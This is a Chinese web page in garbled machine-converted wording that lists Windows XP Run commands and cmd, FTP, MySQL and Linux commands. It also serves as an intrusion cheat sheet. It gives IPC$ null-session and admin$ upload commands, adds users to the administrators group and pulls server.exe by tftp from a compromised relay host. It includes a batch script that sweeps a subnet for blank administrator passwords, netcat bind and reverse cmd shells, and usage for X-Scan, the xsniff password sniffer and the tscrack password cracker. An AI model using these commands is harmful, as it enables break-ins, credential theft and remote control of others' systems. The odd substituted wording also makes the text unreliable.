Windows XP運行命令

標籤：des   http   color   java   使用   os   io   檔案   

運行程式&運行命令輔助功效選項access.cpl
添加硬體嚮導hdwwiz.cpl
添加或者刪除程式appwiz.cpl
管理工具control admintools
自動更新w pl.cpl Bltooth檔案傳送嚮導fsquirt
計算機calc
認證管理節制台certmgr.msc
字元照射表charmap
磁碟查抄工具chkdsk
剪貼簿查看器clipbrd
命令列提示符cmd
元件服務dcomcnfg
電腦管理compmgmt.msc
日期和時間屬性timedate.cpl DDE同享ddeshare
裝備管理器devmgmt.msc Direct X節制面板(要是已安裝)*directx.cpl Direct X診斷工具dxdiag
磁碟清理工具cleanmgr
磁碟磁碟重組程式dfrg.msc
磁碟管理diskmgmt.msc
磁碟分割管理器diskpart
顯示內容control desktop
顯示內容desk.cpl
顯示內容的外觀選項卡control color Dr.Watson系統診斷工具drwtsn32 Driver Verifier Manager verifier
事務查看器eventvwr.msc
檔案署名驗證sigverif
迅速查尋findfast.cpl
檔案夾選項control folders
字型檔夾control fonts
字型檔夾fonts
空檔接龍遊戲freecell
遊戲節制joy.cpl
組策略編輯器(XP專業版)gpedit.msc
紅心大戰遊戲mshearts Iexpress嚮導iexpress
索引服務ciadv.msc Internet屬性inetcpl.cpl IP配備布置公用程式(顯示串連配備布置)ipconfig/all IP配備布置公用程式(顯示DNS緩衝內部實質意義)ipconfig/displaydns IP配備布置公用程式(刪除DNS緩衝內部實質意義)ipconfig/flushdns IP配備布置公用程式(釋放全數(或者指定)適配器的由DHCP分配的動態IP地址)ipconfig/release IP配備布置公用程式(為全數適配器重新分配IP地址)ipconfig/renew IP配備布置公用程式(重新整理DHCP並重新註冊DNS)ipconfig/reg isterdns IP配備布置公用程式(顯示DHCP Class ID)ipconfig/showclassid IP配備布置公用程式(修改DHCP Class ID)ipconfig/setclassid Java節制面板(要是已安裝)jpicpl32.cpl Java節制面板(要是已安裝)javaws
鍵盤屬性control keyboard
本地安全設定secpol.msc
本機使用者和組lusrmgr.msc
從Windows登出logoff
微軟聊天程式winchat
掃雷遊戲winmine
滑鼠屬性control mouse
滑鼠屬性main.cpl
收集串連control netconnections
收集串連ncpa.cpl
收集安裝嚮導netsetup.cpl
記事本notepad Nview案頭管理器(要是已安裝)nvtuicpl.cpl
對象封裝程式packager ODBC數值來源管理員odbccp32.cpl
熒幕鍵盤osk AC3解碼器(要是已安裝)ac3filter.cpl
密碼屬性password.cpl
效能perfmon.msc
效能perfmon
手機與數據機選項telephon.cpl
電源選項屬性powercfg.cpl
印表機和傳真control printers
印表機檔案夾printers TrType造字程式e?it Quicktime(要是已安裝)QuickTime.cpl
地區和語言選項intl.cpl
登錄編輯程式regedit
登錄編輯程式regedit32
遠端桌面mstsc可移動儲存ntmsmgr.msc
可移動儲存操作請求ntmsoprq.msc
策略的結果集(XP專業版)rsop.msc
電子掃描器與照相機sticpl.cpl
任務計劃control schedtasks Windows安全中間wscui.cpl
服務services.msc
同享檔案夾fsmgmt.msc
關閉Windows shutdown
聲響和音頻裝備屬性mmsys.cpl
蛛蛛牌遊戲spider SQL Client用戶端收集工具 + 生產力cliconfg
系統配備布置編輯器sysedit
系統配備布置公用程式msconfig
系統檔案查抄工具(當即電子掃描)sfc/scann ow系統檔案查抄工具(下次啟動時電子掃描)sfc/scanonce系統檔案查抄工具(每次啟動時電子掃描)sfc/scanboot系統檔案查抄工具(返回默許設定)sfc/revert系統檔案查抄工具(斷根檔案快取)sfc/purgecache系統檔案查抄工具(設定緩衝巨細=x)sfc/cachesize=x
系統屬性sysdm.cpl
工作管理員taskmgr Telnet用戶端telnet
使用者帳戶管理nusrmgr.cpl
協助工具輔助管理器utilman Windows防火牆firewall.cpl Windows放大鏡magnify Windows管理體系布局wmimgmt.msc Windows系統安全工具syskey
運行Windows更新wupdmgr
漫遊Windows XP tourstart
寫字板write運行命令大全
gpedit.msc---組策略sndrec32---灌音機Nslookup---IP地址偵測器explorer---開啟資源管理員logoff---登出命令tsshutdn---60秒倒計時關機命令lusrmgr.msc--本機使用者和組services.msc---本地服務設定oobe/msoobe/a--查抄XP是不是啟用notepad--開啟記事本cleanmgr---垃圾整理net start messenger--起頭信差服務compmgmt.msc---電腦管理net stop messenger---遏制信差服務中國站長資訊網conf---啟動netmeeting dvdplay--DVD播放器charmap--啟動字元照射表diskmgmt.msc---磁碟管理公用程式calc---啟動計算機dfrg.msc---磁碟磁碟重組程式中國站長資訊網chkdsk.exe---Chkdsk磁碟查抄devmgmt.msc---裝備管理器regsvr32/u*.dll--遏制dll檔案運行drwtsn32--系統醫生rononce-p--15秒關機dxdiag---查抄DirectX資訊regedt32---登錄編輯程式Msconfig.exe---系統配備布置公用程式rsop.msc---組策略結果集mem.exe--顯示記憶體使用量情況regedit.exe--註冊表winchat--XP內建區域網路聊天progman--程式管理器中國站長資訊網winmsd---系統資訊perfmon.msc--電腦效能監測程式winver---查抄Windows版本sfc/scannow---電子掃描紕繆並複原taskmgr---工作管理員(2000/xp/2003 winver---查抄Windows版本wmimgmt.msc--開啟windows管理體系布局(WMI)wupdmgr--windows更新程式wscript--windows劇本寄主設定write--寫字板winmsd---系統資訊wiaacmgr---電子掃描器和拍照機嚮導winchat--XP內建區域網路聊天中國站長資訊網mem.exe--顯示記憶體使用量情況Msconfig.exe---系統配備布置公用程式mplayer2---簡易widnows media player mspaint--畫圖板mstsc--遠端桌面連線mplayer2---媒體播放機magnify--放大鏡公用程式mmc--開啟節制台mobsync--同步命令dxdiag---查抄DirectX資訊drwtsn32--系統醫生devmgmt.msc---裝備管理器dfrg.msc---磁碟磁碟重組程式diskmgmt.msc---磁碟管理公用程式dcomcnfg---開啟系統元件服務ddeshare---開啟DDE同享設定dvdplay--DVD播放器net stop messenger---遏制信差服務net start messenger--起頭信差服務notepad--開啟記事本中國站長資訊網nslookup---收集管理的工具嚮導ntbackup---系統備份與還原narrator---熒幕"講評人"ntmsmgr.msc--移動儲存管理器ntmsoprq.msc---移動儲存管理員操作請求netstat-an--(TC)命令查抄介面syncapp--建立一個公函包sysedit--系統配備布置編輯器sigverif---檔案署名驗證程式sndrec32---灌音機中國站長資訊網中國站長資訊網shrp w--建立同享檔案夾secpol.msc---本地安全性原則中國站長資訊網syskey---系統加密，一旦加密就不能解開，掩護windows xp系統的兩重密碼services.msc---本地服務設定Sndvol32---音量節製程序sfc.exe--系統檔案查抄器sfc/scannow---windows檔案掩護tsshutdn---60秒倒計時關機命令tourstart--xp簡介(安裝完成後出現的漫遊xp程式)taskmgr--工作管理員eventvwr---事務查看器e?it---造字程式explorer---開啟資源管理員packager---對象封裝程式perfmon.msc--電腦效能監測程式progman--程式管理器中國站長資訊網regedit.exe--註冊表rsop.msc---組策略結果集regedt32---登錄編輯程式rononce-p--15秒關機regsvr32/u*.dll--遏制dll檔案運行regsvr32/u zipfldr.dll--勾銷ZIP支援cmd.exe--CMD命令提示字元chkdsk.exe---Chkdsk磁碟查抄certmgr.msc--認證管理公用程式calc---啟動計算機charmap--啟動字元照射表cliconfg---SQL SERVER用戶端收集公用程式Clipbrd--剪貼簿查看器conf---啟動netmeeting compmgmt.msc---電腦管理中國站長資訊網cleanmgr---垃圾整理ciadv.msc--索引服務程式osk--開啟熒幕鍵盤odbcad32---ODBC數值來源管理員oobe/msoobe/a--查抄XP是不是啟用lusrmgr.msc--本機使用者和組logoff---登出命令iexpress---木馬捆綁工具，系統內建Nslookup---IP地址偵測器fsmgmt.msc---同享檔案夾管理器utilman--協助工具輔助管理器gpedit.msc---組策略
net use\\ip\ipc$""/user：""成立IPC空連結net use\\ip\ipc$"密碼"/user："使用者名稱"成立IPC非空連結net use h：\\ip\c$"密碼"/user："使用者名稱"直接登陸後照射對方C：到本地為H：net use h：\\ip\c$登陸後照射對方C：到本地為H：net use\\ip\ipc$/del刪除IPC連結net use h：/del刪除照射對方到本地的為H：的照射net user使用者名稱密碼/add成立使用者net user gst/active：yes啟用gst使用者net user查看有哪些使用者net user帳戶名稱查看帳戶的屬性net localgroup administrators使用者名稱/add把"使用者"添加到管理員中使其具備管理員權限,注意：administrator後加s用複數net start查看開啟了哪些服務net start服務名開啟服務；(如：net start telnet，net start schedule)net stop服務名遏制某服務net time\\目標ip查看對方時間net time\\目標ip/set設定本機電腦時間與"目標IP"主機的時間同步,加上參數/yes可勾銷確認資訊net view查看本地區域網路內開啟了哪些同享net view\\ip查看對方區域網路內開啟了哪些同享net config顯示系統收集設定net logoff斷裂串連的同享net pause服務名暫停某服務net send ip"文本資訊"向對方發資訊net ver區域網路內正在使用的收集連線類型和資訊net share查看本地開啟的同享net share ipc$開啟ipc$同享net share ipc$/del刪除ipc$同享net share c$/del刪除C：同享net user gst 12345用gst使用者登陸後用將密碼改為12345 net password密碼更改系統登陸密碼netstat-a查看開啟了哪些連接埠,常用netstat-an netstat-n查看連接埠的收集串連情況，常用netstat-an netstat-v查看正在舉行的事情netstat-p和談名例：netstat-p tcq/ip查看某和談使用方式(查看tcp/ip和談使用方式)netstat-s查看正在使用的所有和談使用方式nbtstat-A ip對方136到139其中一個連接埠開了的話，就可查看對方這段登陸的使用者名稱(03前的為使用者名稱)-注意：參數-A要大寫tracert-參數ip(或者電腦名稱)跟蹤路由(數值包)，參數："-w數字"用於設定逾時間隔。ping ip(或者網域名稱)向對方主機送出默許巨細為32位元組的數值，參數："-l[空格]數值包巨細"；"-n送出數值回數"；"-t"指一直ping。ping-t-l 65550 ip滅亡之ping(送出大於64K的檔案並一直ping就成了滅亡之ping)ipconfig(winipcfg)用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數"/all"顯示全數配備布置資訊tlist-t以樹行列表顯示進程項(為系統的附加工具，默許是沒有安裝的，在安裝目錄的Support/tools檔案夾內)kill-F進程項名加-F參數後強制竣事某進程項(為系統的附加工具，默許是沒有安裝的，在安裝目錄的Support/tools檔案夾內)del-F檔案名稱加-F參數後就可刪除唯讀檔案,/AR、/AH、/AS、/AA分別表示刪除唯讀、隱蔽、系統、封存檔案，/A-R、/A-H、/A-S、/A-A表示刪除除唯讀、隱蔽、系統、存檔以外的檔案。例如"DEL/AR*.*"表示刪除目前的目錄下所有唯讀檔案，"DEL/A-S*.*"表示刪除目前的目錄下除系統檔案以外的所有檔案
#2二：
del/S/Q目錄或者用：rmdir/s/Q目錄/S刪除目錄及目錄下的所有子目錄和檔案。同時使用參數/Q可勾銷刪除操作時的系統確認就直接刪除。(二個命令效用不異)move盤符\路徑\要移動的檔案名稱存放移動檔案的路徑\移動後檔案名稱移動檔案,用參數/y將勾銷確認移動目錄存在不異檔案的提示就直接覆蓋fc one.txt two.txt 3st.txt對比二個檔案並把不同之處輸出到3st.txt檔案中，""和""是重新導向命令at id號開啟登入的某個計劃任務at/delete遏制所有計劃任務，用參數/yes則不需要確認就直接遏制at id號/delete遏制某個登入的計劃任務at查看所有的計劃任務at\\ip time程式名(或者一個命令)/r在某時間運行對方某程式並重新啟動電腦finger [email protected]查看這段有哪些使用者登陸telnet ip連接埠遠和登陸伺服器,默許連接埠為23 open ip串連到IP(屬telnet登陸後的命令)telnet在本機上直接鍵入telnet將進入原生telnet copy路徑\檔案名稱1路徑\檔案名稱2/y複製檔案1到指定的目錄為檔案2，用參數/y就同時勾銷確認你要改寫一份現有目錄檔案copy c：\srv.exe\\ip\admin$複製本地c：\srv.exe到對方的admin下cppy 1st.jpg/b+2st.txt/a 3st.jpg將2st.txt的內部實質意義藏身到1st.jpg中產生3st.jpg新的檔案，註：2st.txt檔案頭要空三排，參數：/b指二進位檔案，/a指ASCLL格式檔案copy\\ip\admin$\svv.exe c：\或者：copy\\ip\admin$\*.*複製對方admini$同享下的srv.exe檔案(所有檔案)至本地C：xcopy要複製的檔案或者分類樹目標地址\目錄名複製檔案和分類樹，用參數/Y將不提示覆蓋不異檔案tftp-i本身IP(用肉機作跳板時這用肉機IP)get server.exe c：\server.exe登陸後，將"IP"的server.exe下載到目標主機c：\server.exe參數：-i指以二進位模式傳送，如傳送exe檔案時用，如不加-i則以ASCII模式(傳送文字檔模式)舉行傳送tftp-i對方IP put c：\server.exe登陸後，上傳本地c：\server.exe至主機ftp ip連接埠用於上傳檔案至伺服器或者舉行檔案操作，默許連接埠為21。bin指用二進位體式格局傳送(可執行檔進)；默許為ASCII格式傳送(文字檔時)route print顯示出IP路由，將主要顯示收集地址Network addres，子網路遮罩Netmask，網關地址Gateway addres，介面地址Interface arp查看和處置懲罰ARP緩衝，ARP是名字剖析的意思，負責把一個IP剖析成一個物理性的MAC地址。arp-a將顯示出全數資訊start程式名或者命令/max或者/min新開一個新視窗並最大化(最小化)運行某程式或者命令mem查看cpu使用方式attrib檔案名稱(目錄名)查看某檔案(目錄)的屬性attrib檔案名稱-A-R-S-H或者+A+R+S+H去掉(添加)某檔案的存檔，唯讀，系統，隱蔽屬性；用+則是添加為某屬性dir查看檔案，參數：/Q顯示檔案及目錄屬系統哪一個使用者，/T：C顯示檔案建立時間，/T：A顯示檔案前次被訪問時間，/T：W前次被修改時間date/t、time/t使用此參數即"DATE/T"、"TIME/T"將只顯示當前日期和時間，而沒必要輸入新日期和時間set指定環境變數名稱=要指派給變數的字元設定環境變數set顯示當前所有的環境變數set p(或者其它字元)顯示出當前以字元p(或者其它字元)開首的所有環境變數pause暫停批處置懲罰程式，並顯示出：請按任意鍵繼續.if在批處置懲罰程式中執行前提處置懲罰(更多說明見if命令及變數)goto標籤將cmd.exe導向到批處置懲罰程式中帶標籤的行(標籤必須單獨一行，且以冒號打頭，例如："：start"標籤)call路徑\批處置懲罰檔案名稱從批處置懲罰程式中挪用另一個批處置懲罰程式(更多說明見call/?)for對一組檔案中的每一個檔案執行某個特別指定命令(更多說明見for命令及變數)echo on或者off開啟或者關閉echo，僅用echo不加參數則顯示當前echo設定echo資訊在熒幕上顯示出資訊echo資訊pass.txt將"資訊"儲存到pass.txt檔案中findstr"Hello"aa.txt在aa.txt檔案中尋覓字串hello find檔案名稱查尋某檔案title標落款字更改CMD視窗標落款字color色彩值設定cmd節制台前景和背景色彩；0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=湖藍、A=湖綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白prompt名稱更改cmd.exe的顯示的命令提示字元(把C：\、D：\統一改為：EntSky\)
#3三：
ver在DOS視窗下顯示版本資訊winver彈出一個視窗顯示版本資訊(記憶體巨細、系統版本、補丁版本、電腦名稱)format盤符/FS：類型格式化磁碟,類型：FAT、FAT32、NTFS,例：Format D：/FS：NTFS md目錄名建立目錄replace源檔案要替換檔案的目錄替換檔案ren原檔案名稱新檔案名稱重新命名檔案名稱tree以樹形布局顯示出目錄，用參數-f將列出第個檔案夾中檔案名稱type檔案名稱顯示文字檔的內部實質意義more檔案名稱逐屏顯示輸出檔案doskey要鎖定的命令=字元doskey要解鎖命令=為DOS提供的鎖定命令(編輯命令行，重新挪用win2k命令，並建立宏)。如：鎖定dir命令：doskey dir=entsky(不能用doskey dir=dir)；解鎖：doskey dir=taskmgr調出來擔工作管理員chkdsk/F D：查抄磁碟D並顯示狀態報表；加參數/f並修複磁碟上的紕繆tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默許連接埠23為其它任何連接埠exit退出cmd.exe程式或者目前，用參數/B則是退出當前批處置懲罰劇本而不是cmd.exe path路徑\可執行檔的檔案名稱為可執行檔設定一個路徑。cmd啟動一個win2K命令解釋視窗。參數：/eff、/en關閉、開啟命令擴充；更我申述見cmd/?regedit/s註冊表檔案名稱匯入註冊表；參數/S指安靜模式匯入，無任何提示；regedit/e註冊表檔案名稱匯出註冊表cacls檔案名稱參數顯示或者修改檔案訪問節制列表(ACL)--針對NTFS格式時。參數：/D使用者名稱：設定拒絕某使用者訪問；/P使用者名稱：perm替換指定使用者的存取權限；/G使用者名稱：perm賦予指定使用者存取權限；Perm可以是：N無，R讀取，W寫入，C更改(寫入)，F純粹節制；例：cacls D：\test.txt/D p 設定d：\test.txt拒絕p 使用者訪問。cacls檔案名稱查看檔案的訪問使用者權限列表REM文本內部實質意義在批處置懲罰檔案中添加註解netsh查看或者更改本地收集配備布置情況
#4四：
IIS服務命令：iisreset/reboot重啟win2k電腦(但有提示系統將重啟資訊出現)iisreset/start或者stop啟動(遏制)所有Internet服務iisreset/restart遏制然後重新啟動所有Internet服務iisreset/status顯示所有Internet服務狀態iisreset/enable或者disable在本地系統上開始使用(禁用)Internet服務的重新啟動iisreset/rebootonerror當啟動、遏制或者重新啟動Internet服務時，若發生紕繆將重新開機iisreset/noforce若無法遏制Internet服務，將不會強制終止Internet服務iisreset/timeout Val在到達逾時間(秒)時，仍未遏制Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，遏制60秒，重新開機0秒。FTP命令：(後面有申述內部實質意義)ftp的命令列格式為：ftp-v-d-i-n-g[主機名稱]-v顯示遠程伺服器的所有響應資訊。-d使用調試體式格局。-n限定ftp的自動登入,即不使用.netrc檔案。-g勾銷通用檔案名。help[命令]或者?[命令]查看命令說明bye或者quit終止主機FTP進程項,並退出FTP管理體式格局.pwd列出當前遠端主機目錄put或者send本地檔案名稱[上傳到主機上的檔案名稱]將本地一個檔案傳送至遠端主機中get或者recv[遠程主機檔案名稱][下載到本地後的檔案名稱]從遠端主機中傳送至本地主機中mget[remote-files]從遠端主機吸收一批檔案至本地主機mput local-files將本地主機中一批檔案傳送至遠端主機dir或者ls[remote-directory][local-file]列出當前遠端主機目錄中的檔案.要是有本地檔案,就將結果寫至本地檔案ascii設定以ASCII體式格局傳送檔案(預設值)bin或者image設定以二進位體式格局傳送檔案bell每完成一次檔案傳送,警示提示cdup返回上一級目錄關了中斷與遠程伺服器的ftp對話(與open對應)open host[port]成立指定ftp伺服器串連,可指定串連連接埠delete刪除遠端主機中的檔案mdelete[remote-files]刪除一批檔案mkdir directory-name在遠端主機中成立目錄rename[from][to]改變遠端主機中的檔案名稱rmdir directory-name刪除遠端主機中的目錄status顯示當前FTP的狀態system顯示遠端主機系統類別型user user-name[password][account]重新以別的使用者名稱登入遠端主機open host[port]重新成立一個新的串連prompt互動提示模式macdef界說宏命令lcd改變當前本地主機的事情目錄,要是預設,就轉到目前使用者的HOME目錄chmod改變遠端主機的檔案許可權case當為ON時,用MGET命令複印的檔案名稱到本地呆板中,全數轉換為小寫字母cd remote-dir進入遠程主機目錄cdup進入遠程主機目錄的父目錄！在本地機中執行互動shell，exit回到ftp環境,如！ls*.zip
#5五：
MYSQL命令：mysql-h主機地址-u使用者名稱-p密碼串連MYSQL；要是剛安裝好MYSQL，超等使用者root是沒有密碼的。(例：mysql-h 110.110.110.110-Uroot-P 123456註：u與root可以不用加空格，其它也一樣)exit退出MYSQL mysqladmin-u使用者名稱-p舊密碼password新密碼修改密碼grant select on數值庫.*to使用者名稱@登入主機identified by\"密碼\"；增加新使用者。(注意：和上邊不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令竣事符)show databases；顯示數值庫列表。剛起頭時才兩個數值庫：mysql和test。mysql庫很重要它內裡有MYSQL的系統資訊，咱們改密碼和新增使用者，現實上就是用這個庫舉行操作。use mysql；show tables；顯示庫中的數值表describe表名；顯示數值表的布局create database庫名；建庫use庫名；create table表名(欄位設定列表)；建表drop database庫名；drop table表名；刪庫和刪表delete from表名；將表中記錄清空select*from表名；顯示表中的記錄mysqldump--opt school school.bbb備份數值庫：(命令在DOS的\\mysql\\bin目錄下執行)；注釋：將數值庫school備份到school.bbb檔案，school.bbb是一個文字檔，檔案名稱任取，開啟看看你會有新發現。win2003系統下新增命令(實用部份)：shutdown/參數關閉或者重啟本地或者遠程主機。參數說明：/S關閉主機，/R重啟主機，/T數字設定延時的時間，範圍0~180秒之間，/A勾銷開機，/M//IP指定的遠程主機。例：shutdown/r/t 0當即重啟本地主機(無延時)taskill/參數進程項名或者進程項的pid終止一個或者多個任務和進程項。參數說明：/PID要終止進程項的pid,可用tasklist命令獲得各進程項的pid，/IM要終止的進程項的進程項名，/F強制終止進程項，/T終止指定的進程項及他所啟動的子進程項。tasklist顯示當前運行在本地和遠程主機上的進程項、服務、服務各進程項的進程項標識符(PID)。參數說明：/M列出當前進程項載入的dll檔案，/SVC顯示出每一個進程項對應的服務，無參數時就只列出當前的進程項。
#6六：
Linux系統下基本命令：要區分巨細寫uname顯示版本資訊(同win2K的ver)dir顯示目前的目錄檔案,ls-al顯示包括隱蔽檔案(同win2K的dir)pwd查詢當前所在的目錄位置cd cd.回到上一層目錄，注意cd與.之間有空格。cd/返回到根目錄。cat檔案名稱查看檔案內部實質意義cat abc.txt往abc.txt檔案中寫上內部實質意義。more檔案名稱以一頁一頁的體式格局顯示一個文字檔。cp複製檔案mv移動檔案rm檔案名稱刪除檔案，rm-a目錄名刪除目錄及子目錄mkdir目錄名成立目錄rmdir刪除子目錄，目錄內沒有文檔。chmod設定檔案或者目錄的存取許可權grep在檔案中查尋字串diff檔案檔案比較find檔案搜尋date此刻的日期、時間who查詢目前和你使用同一台呆板的人以及Login時間地點w查詢目前上機者的詳細資料whoami查看本身的帳號名稱groups查看某人的Group passwd更改密碼history查看本身下過的命令ps顯示進程項狀態kill遏制某進程項gcc駭客通常用它來編譯C語言寫的檔案su許可權轉換為指定使用者telnet IP telnet串連對方主機(同win2K)，當出現bash$時就說明串連樂成。ftp ftp串連上某伺服器(同win2K)
附：批處置懲罰命令與變數
1：for命令及變數基本格式：FOR/參數%variable IN(set)DO command[command_parameters]%variable：指定一個純一字母可替換的參數，如：%i，而指定一個變數則用：%%i，而挪用變數時用：%i%，變數是區分巨細寫的(%i不等於%I)。批處置懲罰每次能處置懲罰的變數從%0-%9共10個，其中%0默許給批處置懲罰檔案名稱使用，%1默許為使用此批處置懲罰時輸入的的第一個值，同理：%2-%9指輸入的第2-9個值；例：net use\\ip\ipc$pass/user：user中ip為%1,pass為%2,user為%3
(set)：指定一個或者一組檔案，可使用萬用字元，如：(D：\user.txt)和(1 1254)(1-1 254),{"(1 1254)"第一個"1"指起始值，第二個"1"指增長量，第三個"254"指竣事值，即：從1到254；"(1-1 254)"說明：即從254到1}
command：指定對第個檔案執行的命令，如：net use命令；如要執行多個命令時，命令這間加：&來隔開command_parameters：為特別指定命令指定參數或者命令列開關
IN(set)：指在(set)中取值；DO command：指執行command
參數：/L指用增量形式{(set)為增量形式時}；/F指從檔案中不斷取值，直到取完截止{(set)為檔案時，如(d：\pass.txt)時}。用法舉例：@echo off echo用法格式：test.bat*.*.*test.txt for/L%%G in(1 1254)do echo%1.%%G test.txt&net use\\%1.%%G/user：administrator|find"命令樂成完成"test.txt存為test.bat說明：對指定的一個C類網段的254個IP依次試成立administrator密碼為空白的IPC$串連，要是樂成就把該IP存在test.txt中。
/L指用增量形式(即從1-254或者254-1)；輸入的IP前面三位：*.*.*為批處置懲罰默許的%1；%%G為變數(ip的最後一位)；&用來隔開echo和net use這二個命令；|指成立了ipc$後，在結果中用find查看是不是有"命令樂成完成"資訊；%1.%%G為完整的IP地址；(1 1254)指起始值，增長量，結止值。@echo off echo用法格式：ok.bat ip FOR/F%%i IN(D：\user.dic)DO smb.exe%1%%i D：\pass.dic 200存為：ok.exe說明：輸入一個IP後，用字典檔案d：\pass.dic來暴解d：\user.dic中的使用者密碼，直到檔案中值取完截止。%%i為使用者名稱；%1為輸入的IP地址(默許)。
#7七：
2：if命令及變數基本格式：IF[not]errorlevel數字命令語句要是程式運行最後返回一個等於或者大於指定命字的退出編碼，指定前提為"真"。例：IF errorlevel 0命令指程式執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1命令指程式執行最後返回的值不等於1，就執行後面的命令。0指發現並樂成執行(真)；1指沒有發現、沒執行(假)。IF[not]字串1==字串2命令語句要是指定的文本字串般配(即：字串1等於字串2)，就執行後面的命令。例："if"%2%"=="4"goto start"指：要是輸入的第二個變數為4時，執行後面的命令(注意：挪用變數時就%變數名%並加"")IF[not]exist檔案名稱命令語句要是指定的檔案名稱存在，就執行後面的命令。例："if not nc.exe goto end"指：要是沒有發現nc.exe檔案就跳到"：end"標籤處。IF[not]errorlevel數字命令語句else命令語句或者IF[not]字串1==字串2命令語句else命令語句或者IF[not]exist檔案名稱命令語句else命令語句加上：else命令語句後指：當前面的前提不成立時，就指行else後面的命令。注意：else必須與if在同一行才有效。當有del命令時需把del命令全數內部實質意義用括起來，因為del命令要單獨一行時才能執行，用上後就等於是單獨一行了；例如："if exist test.txt.del test.txt.else echo test.txt.missing"，注意命令中的"."
(二)系統外部命令(均需下載相關工具)：
1、瑞士軍刀：nc.exe
參數說明：-h查看協助資訊-d後台模式-e prog程式重新導向，一但串連就執行〔危險〕-i secs延時的間隔-l監聽模式，用於入站串連-L監聽模式，串連天閉後仍然繼續監聽，直到CTR+C-n IP地址，不能用網域名稱-o film記錄16進位的傳輸-p[空格]連接埠本地連接埠號碼-r隨機本地及遠程連接埠-t使用Telnet互動體式格局-u P模式-v詳細輸出，用-vv將更詳細-w數字timeout延時間隔-z將輸入，輸出關掉(用於掃錨時)基本用法：nc-nvv 192.168.0.1 80串連到192.168.0.1主機的80連接埠nc-l-p 80開啟原生TCP 80連接埠並監聽nc-nvv-w2-z 192.168.0.1 80-1024掃錨192.168.0.1的80-1024連接埠nc-l-p 5354-t-e c：winntsystem32cmd.exe綁定remote主機的cmdshell在remote的TCP 5354連接埠nc-t-e c：winntsystem32cmd.exe 192.168.0.2 5354梆定remote主機的cmdshell並反向串連192.168.0.2的5354連接埠進階用法：nc-L-p 80作為蜜罐用1：開啟並不斷地監聽80連接埠，直到CTR+C截止nc-L-p 80 c：\log.txt作為蜜罐用2：開啟並不斷地監聽80連接埠，直到CTR+C,同時把結果輸出到c：\log.txt nc-L-p 80 c：\honeyport.txt作為蜜罐用3-1：開啟並不斷地監聽80連接埠，直到CTR+C,並把c：\honeyport.txt中內部實質意義送入管道中，亦可起到傳送檔案效用type.exe c：\honeyport|nc-L-p 80作為蜜罐用3-2：開啟並不斷地監聽80連接埠，直到CTR+C,並把c：\honeyport.txt中內部實質意義送入管道中,亦可起到傳送檔案效用本機上用：nc-l-p本機連接埠在對方主機上用：nc-e cmd.exe本機IP-p本機連接埠*win2K nc-e/bin/sh本機IP-p本機連接埠*linux,unix反向串連突破對方主機的防火牆本機上用：nc-d-l-p本機連接埠要傳送的檔案路徑及名稱在對方主機上用：nc-vv本機IP本機連接埠存放檔案的路徑及名稱傳送檔案到對方主機備忘：|管道命令或者重新導向命令。""，例如：tlntadmn test.txt指把test.txt的內部實質意義賦值給tlntadmn命令@表示執行@後面的命令，但不會顯示出來(後台執行)；例：@dir c：\winnt d：\log.txt意思是：後台執行dir，並把結果存在d：\log.txt中與的區別""指：覆蓋；""指：儲存到(添加到)。如：@dir c：\winnt d：\log.txt和@dir c：\winnt d：\log.txt二個命令分別執行二次比較看：用的則是把二次的結果都儲存了，而用：則只有一次的結果，是因為第二次的結果把首屆的覆蓋了。
#8八：
2、掃錨工具：xscan.exe
基本格式xscan-host起始IP[-終止IP]檢測項目[其它選項]掃錨"起始IP到終止IP"段的所有主機資訊xscan-file主機列表檔案名稱檢測項目[其它選項]掃錨"主機IP列表檔案名稱"中的所有主機資訊檢測項目-active檢測主機是不是存活-os檢測遠程作業系統類型(通過NETBIOS和SNMP和談)-port檢測常用服務的連接埠狀態-ftp檢測FTP弱口令-p 檢測FTP服務匿名使用者寫入權限-pop3檢測POP3-Server弱口令-smtp檢測SMTP-Server漏洞-sql檢測SQL-Server弱口令-smb檢測NT-Server弱口令-iis檢測IIS編碼/解碼漏洞-cgi檢測CGI漏洞-nasl載入Nessus進犯劇本-all檢測以上所有項目其它選項-i適配器編號設定收集適配器,適配器編號可通過"-l"參數擷取-l顯示所有收集適配器-v顯示詳細電子掃描進度-p跳過沒有響應的主機-o跳過沒有檢測到開放連接埠的主機-t並發線程數量,並發主機數量指定最大並發線程數量和並發主機數量,默許數量為100,10-log檔案名稱指定電子掃描報告檔案名稱(尾碼為：TXT或者HTML格式的檔案)用法樣本xscan-host 192.168.1.1-192.168.255.255-all-active-p檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機xscan-host 192.168.1.1-192.168.255.255-port-smb-t 150-o檢測192.168.1.1-192.168.255.255網段內主機的規範連接埠狀態，NT弱口令使用者，最大並發線程數量為150，跳過沒有檢測到開放連接埠的主機xscan-file hostlist.txt-port-cgi-t 200,5-v-o檢測"hostlist.txt"檔案中列出的所有主機的規範連接埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放連接埠的主機
#9九：
三、命令列體式格局嗅探器：xsniff.exe可捕捉區域網路內FTP/SMTP/POP3/HTTP和談密碼參數說明-tcp輸出TCP數值報- p輸出 P數值報-icmp輸出ICMP數值報-pass過濾密碼資訊-hide後台運行-host剖析主機名稱-addr IP地址過濾IP地址-port連接埠過濾連接埠-log檔案名稱將輸出儲存到檔案-asc以ASCII形式輸出-hex以16進位形式輸出用法樣本xsniff.exe-pass-hide-log pass.log後台運行嗅探密碼並將密碼資訊儲存在pass.log檔案中xsniff.exe-tcp- p-asc-addr 192.168.1.1嗅探192.168.1.1並過濾tcp和 p資訊並以ASCII格式輸出
4、終端服務密碼破解：tscrack.exe
參數說明-h顯示使用協助-v顯示版本資訊-s在熒幕上打出解密能力-b密碼紕繆時發出的聲響-t同-b